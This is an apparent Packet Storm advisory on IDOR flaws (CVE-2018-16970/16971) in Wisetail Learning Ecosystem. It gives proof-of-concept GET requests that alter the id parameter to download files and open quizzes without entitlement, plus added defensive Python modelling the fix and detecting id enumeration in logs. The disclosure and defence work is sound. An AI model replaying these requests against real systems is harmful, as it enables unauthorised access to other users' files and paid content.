Wisetail Learning Ecosystem 4.11.6 Insecure Direct Object Reference

2018-09-13T00:00:00
ID PACKETSTORM:149356
Type packetstorm
Reporter S. M. Zia Ur Rashid
Modified 2018-09-13T00:00:00

Description

                                        
Title: Multiple IDOR vulnerabilities in Wisetail Learning Ecosystem (LE) up to v4.11.6
  
  
  
*Date:* 12/09/2019
  
*Author:* S. M. Zia Ur Rashid
  
*Vendor Homepage:* wisetail.com  
  
*Author Contact:* https://www.linkedin.com/in/ziaurrashid/
  
*Affected Version:* <= 4.11.6  
  
*Assigned CVE:* CVE-2018-16970, CVE-2018-16971
  
  
  
*Description:* Wisetail Learning Ecosystem (LE) up to v4.11.6 suffers from
multiple insecure direct object reference (IDOR) vulnerabilities. The server
resolves files and quiz tests by a client-supplied id without checking that the
requester is entitled to them, so a user can download files and open the quiz
test of a course they have not purchased simply by modifying the id parameter.
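As an added defender-side illustration (not Wisetail's code and not part of the advisory), the Python model below shows the access pattern just described, an object fetched by a client-supplied `id` with no entitlement check, next to a handler that first verifies the requesting user has purchased the course the file or quiz belongs to. The `User` and `CourseObject` types, the registries standing in for the `eco_download.php` and `eco_test.php` lookups, and every id and name in them are constructed for the example.

```python
# Added example (not Wisetail's code): a minimal model of the IDOR described
# in the advisory and of the server-side check that closes it. Users, courses,
# file ids and quiz ids below are constructed for illustration.
from dataclasses import dataclass, field


class NotFound(Exception):
    """Answer a 404 both when the object is missing and when the caller is
    not entitled to it, so the id space cannot be mapped via 403-vs-404."""


@dataclass
class User:
    user_id: int
    purchased_courses: set = field(default_factory=set)  # course ids the user paid for


@dataclass
class CourseObject:
    object_id: int
    course_id: int   # the course this file or quiz belongs to
    payload: str     # file name or quiz title


# Constructed registries standing in for the eco_download.php / eco_test.php tables
FILES = {
    2639: CourseObject(2639, course_id=7, payload="week1-slides.pdf"),
    2640: CourseObject(2640, course_id=9, payload="final-exam-key.pdf"),
}
QUIZZES = {
    29: CourseObject(29, course_id=9, payload="Final quiz"),
}


def download_vulnerable(user: User, file_id: int) -> str:
    """The IDOR: the object is fetched by the client-supplied id alone.
    Any logged-in user who changes id=2639 to id=2640 gets the other file."""
    if file_id not in FILES:
        raise NotFound
    return FILES[file_id].payload


def fetch_entitled(registry: dict, object_id: int, user: User) -> str:
    """The fix: resolve the id, then verify the requesting user is entitled to
    the course the object belongs to before releasing it."""
    obj = registry.get(object_id)
    if obj is None or obj.course_id not in user.purchased_courses:
        raise NotFound
    return obj.payload


def download_fixed(user: User, file_id: int) -> str:
    return fetch_entitled(FILES, file_id, user)


def quiz_fixed(user: User, quiz_id: int) -> str:
    return fetch_entitled(QUIZZES, quiz_id, user)


if __name__ == "__main__":
    alice = User(1, purchased_courses={7})
    print(download_vulnerable(alice, 2640))   # leaks the course-9 file
    print(download_fixed(alice, 2639))        # allowed: she bought course 7
    try:
        quiz_fixed(alice, 29)                 # refused: course 9 not purchased
    except NotFound:
        print("quiz 29: not found")
```

The single `fetch_entitled` helper is the point: every object that belongs to a course goes through one authorisation path keyed on the session's user, not on anything the client sends, and the unauthorised case is indistinguishable from a missing id.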
  
  
  
*Proof-of-Concept (POC):*
  
  
*// File Disclosure*

```http
GET /eco_download.php?id=2639 HTTP/1.1
Host: xxxxxxx
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: xxxxxxxxxxxxxx
Upgrade-Insecure-Requests: 1
```
  
  
  
*// Access Quiz Test*

```http
GET /eco_test.php?id=29 HTTP/1.1
Host: xxxxxxx
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: xxxxxxx
Upgrade-Insecure-Requests: 1
```
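For operators watching for this class of abuse, here is an added example (not part of the advisory and not Wisetail's code) of detection logic run over constructed web-server access-log lines: it parses Common Log Format entries and flags any client that successfully retrieves several distinct `id` values from the two endpoints named in the PoC inside a short sliding window. The log lines, client addresses, window and threshold are constructed; only the endpoint paths `/eco_download.php` and `/eco_test.php` come from the advisory.

```python
# Added example (not from the advisory): detection logic for the id-walking
# access pattern that exploitation of an IDOR on eco_download.php / eco_test.php
# leaves in a web-server access log. The log lines are constructed; the paths
# are the two endpoints named in the PoC.
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Constructed sample log: one client walks four file ids and a quiz id in five
# seconds; another fetches a single file and an unrelated page.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Sep/2018:10:00:01 +0000] "GET /eco_download.php?id=2639 HTTP/1.1" 200 5120
10.0.0.5 - - [13/Sep/2018:10:00:02 +0000] "GET /eco_download.php?id=2640 HTTP/1.1" 200 4410
10.0.0.5 - - [13/Sep/2018:10:00:03 +0000] "GET /eco_download.php?id=2641 HTTP/1.1" 200 3900
10.0.0.5 - - [13/Sep/2018:10:00:04 +0000] "GET /eco_download.php?id=2642 HTTP/1.1" 200 2200
10.0.0.5 - - [13/Sep/2018:10:00:05 +0000] "GET /eco_test.php?id=29 HTTP/1.1" 200 8800
10.0.0.9 - - [13/Sep/2018:10:02:10 +0000] "GET /eco_download.php?id=2639 HTTP/1.1" 200 5120
10.0.0.9 - - [13/Sep/2018:10:09:44 +0000] "GET /course.php?id=7 HTTP/1.1" 200 9000
"""

# Common Log Format: client ident user [time] "method target protocol" status bytes
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)
WATCHED_PATHS = {"/eco_download.php", "/eco_test.php"}


def parse_line(line):
    """Return ip, timestamp, path, id and status for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    ids = parse_qs(url.query).get("id")
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "path": url.path,
        "id": ids[0] if ids else None,
        "status": int(m["status"]),
    }


def find_id_enumeration(log_text, window_seconds=60, threshold=3):
    """Flag clients that successfully fetched at least `threshold` distinct
    object ids from the watched endpoints inside a sliding window.
    Returns {ip: sorted list of (path, id)} for each flagged client."""
    events = [
        e for e in map(parse_line, log_text.splitlines())
        if e and e["path"] in WATCHED_PATHS and e["id"] and e["status"] == 200
    ]
    by_client = defaultdict(list)
    for e in events:
        by_client[e["ip"]].append(e)

    alerts = {}
    for ip, evs in by_client.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            # Advance the window start until it lies within window_seconds of evs[end]
            while (evs[end]["ts"] - evs[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            distinct = {(e["path"], e["id"]) for e in evs[start:end + 1]}
            if len(distinct) >= threshold:
                alerts[ip] = sorted(distinct)
    return alerts


if __name__ == "__main__":
    for ip, objects in find_id_enumeration(SAMPLE_LOG).items():
        print(ip, "walked", len(objects), "objects:", objects)
```

Only 200 responses are counted because a successful IDOR returns the object; once the server answers 404 for non-entitled ids, the same walk shows up as a burst of 404s on those paths, which is a separate and equally useful signal to alert on.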
  
  
  
*Video POC:* https://youtu.be/l3msLYdI3fI  
  
  
  
*References:*  
  
https://blog.ziaurrashid.com/wisetail-learning-ecosystem-multiple-idor-vunlerability/  
  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16970  
  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16971  
  
  
*Regards,*  
*S M Zia Ur Rashid*  
Student, Dept. of EEE, International Islamic University Chittagong  
Student Ambassador, IEEEmadC  
Public Relation Ambassador, IEEEXtreme Programming Competition 12.0  
Webmaster, IEEE Bangladesh Section Student Activities Committee 2018  
Webmaster, IEEE IIUC Student Branch (2018)  
Contact: E-mail <smziaurrashid@gmail.com> *|* Web <https://ziaurrashid.com/>  
  
Connect: Facebook <https://www.facebook.com/smziaurrashid.info> *|* LinkedIn  
<https://www.linkedin.com/in/ziaurrashid>  